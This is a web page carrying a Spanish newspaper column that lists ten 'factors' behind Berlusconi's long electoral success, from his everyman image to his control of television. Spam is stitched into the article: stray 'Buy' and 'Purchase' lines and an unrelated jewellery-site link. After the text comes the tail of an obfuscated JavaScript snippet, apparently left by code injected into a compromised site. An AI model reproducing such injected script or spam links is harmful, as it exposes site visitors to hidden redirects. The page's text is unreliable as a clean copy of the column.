• Noticias maquetadas 04.11.2010

    online

    BEPPE SEVERGNINI

    Diez motivos para amar a Berlusconi

     Explicar a Berlusconi a los italianos es perder el tiempo. Cada uno tiene su idea y no la va a cambiar. Pero es útil intentar explicar el personaje a la posteridad y, ¿por qué no?, también a los extranjeros. ¿Cómo es posible que fuera votado una vez (1994), una segunda (2001), otra más (2008) y corra el riesgo de ganar las próximas elecciones? Si ha dominado la vida pública italiana durante 20 años, hay una razón. O mejor, 10.

    Buy

    1. Factor Humano. ¿Qué opina la mayoría de los italianos? «Se parece a nosotros, es uno de nosotros». Y quien no opina así, le tiene miedo. B. quiere a sus hijos, habla de la mamma, sabe de fútbol, ama las casas nuevas, detesta las normas, cuenta chistes, dice tacos, adora a las mujeres, las fiestas y la buena compañía. Tiene buena memoria y a la vez, amnesias tácticas. Ha llegado lejos alternando autopistas y atajos. Es un anticonformista consciente de la importancia del conformismo. Muchos italianos no se preocupan de los conflictos de interés (y quién no tiene?), de los problemas con la justicia (mejor los imputados que los magistrados), de sus salidas inoportunas (es tan espontáneo…).

    http://www.meleksjewels.com/?p=6832

    2. Factor Divino. B. entendió que muchos italianos aplauden a la Iglesia para sentirse menos culpables cuando no van a misa, e ignoran con regularidad siete mandamientos de 10. La coherencia no es una cualidad que exijamos a nuestros líderes. La indignación privada ante la incoherencia pública es el móvil del voto en muchas democracias. En Italia no. B. entendió con qué tiene que ver: una nación que para evitar desengaños no se hace ilusiones. El Vaticano se conforma con una ley favorable y no se preocupa del mal ejemplo.

    3. Factor Robinson. Cada italiano se siente solo contra el mundo. O más bien contra los vecinos. La supervivencia – personal, familiar, social y económica – es motivo de orgullo y prueba de ingenio. Mucho se ha escrito sobre el individualismo nacional. B. empezó aquí: primero construyo su fortuna, acreditándose como un hombre hecho a sí mismo; luego construyó sobre la desconfianza hacia lo compartido y la intolerancia hacia las normas. En Italia no se pide un sistema fiscal más justo. Se sortea el que existe. Cada uno de nosotros se siente como Robinson Crusoe, náufrago en una península abarrotada de gente.

    Buy
    Purchase

    4. Factor Truman. ¿Cuántos periódicos se venden todos los días en Italia, si quitamos los deportivos? Cinco millones. ¿Cuántos italianos entran con regularidad en una librería? Cinco millones. ¿Cuántos visitan las páginas de información? Cinco millones. La sospecha es que son siempre los mismos. Vamos a llamarlo el Five Million Club. ¿Es importante? Claro, pero no decide las elecciones. La televisión es fundamental por los personajes que crea, los mensajes que lanza, por lo que dice y lo que calla. ¿Y quién posee la TV privada y controla la pública en Italia?

    5. Factor Hoover. La Hoover, fundada en 1908 en New Berlin, hoy Canton, Ohio, es la marca de aspiradoras por antonomasia. Sus representantes eran legendarios: tenaces, expertos, hábiles psicólogos, vendedores implacables de su mercancía. B. posee una capacidad de seducción comercial que ha heredado de sus anteriores profesiones – construcción, publicidad, televisión- y aplicado a la política. La consciencia de que el mensaje tiene que ser sencillo, agradable y alentador. La convicción de que la reiteración da beneficios. La obsesión con el aspecto exterior (entre un buen aspecto y un buen comportamiento, en Italia no hay dudas).

    6. Factor Zelig. Ponerse en la piel de los interlocutores: una característica necesaria a cada político. La capacidad de transformarse en ellos es más rara. El deseo de ser grato le ha enseñado a B. técnicas dignas de Zelig, camaleónico protagonista del film de Woody Allen. Padre de familia con hijos. Mujeriego con las mujeres. Joven entre los jóvenes. Sabio con los ancianos. Trabajador entre los obreros. Empresario entre empresarios. Hincha entre los hinchas.

    7. Factor Harén. B. negó en primer lugar los escándalos eróticos, pero finalmente aceptó la reputación: « No soy un santo». Las revelaciones no le han perjudicado: perdió la mujer, no los votos. Muchos italianos prefieren la autoindulgencia a la autodisciplina; y no niegan que él, en el fondo, hace lo que ellos sueñan. No es sólo el aspecto erótico: la juventud es contagiosa. Un fiel colaborador de 60 años describe su intolerancia a las largas reuniones: «Tiene miedo a que le peguemos la vejez».

    8. Factor Medici. La Señoría -junto al Comune- es la única creación política original de los italianos. Todas las demás se importaron. La actitud de muchos italianos de hoy hacia B. recuerda aquello de los italianos de ayer hacia el señor: sabemos que él se preocupa por su gloria, por su familia, y por sus intereses; esperemos que se preocupe un poco por nosotros también.

    9. Factor TINA. There Is No Alternative (Sin alternativa). El acrónimo, acuñado por Thatcher, explica la condición de muchos de los electores. La alternativa del centro-izquierda resultó poco apetecible: coaliciones conflictivas, propuestas inconsistentes, comportamientos hipócritas. Los italianos son realistas. Antes de elegir lo que consideran justo, escogen lo útil. Algunas iniciativas de B. gustan (o al menos disgustan menos que la alternativa).

    10. Factor Palio. ¿Saben lo que es el Palio de Siena? Ganarlo es una alegría inmensa. Pero existe una mayor: la derrota del rival. Así funcionan muchas cosas en Italia: desde la cultura a la Administración, desde las profesiones al deporte. La política no es distinta: el tribalismo es un instinto. Con tal de mantener fuera la izquierda, considerada no fiable, muchos italianos habrían votado al mismo demonio. Y B. sabe ser diabólico. Pero el diablo, digámoslo, tiene otro estilo. Beppe Severgnini es columnista del diario italiano Corriere della Sera y publica en noviembre El vientre de los italianos. Berlusconi explicado a la posteridad.

    x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}

  • Comments are closed.

Calendario de artículos

noviembre 2010
L M X J V S D
1234567
891011121314
15161718192021
22232425262728
2930  

Artículos anteriores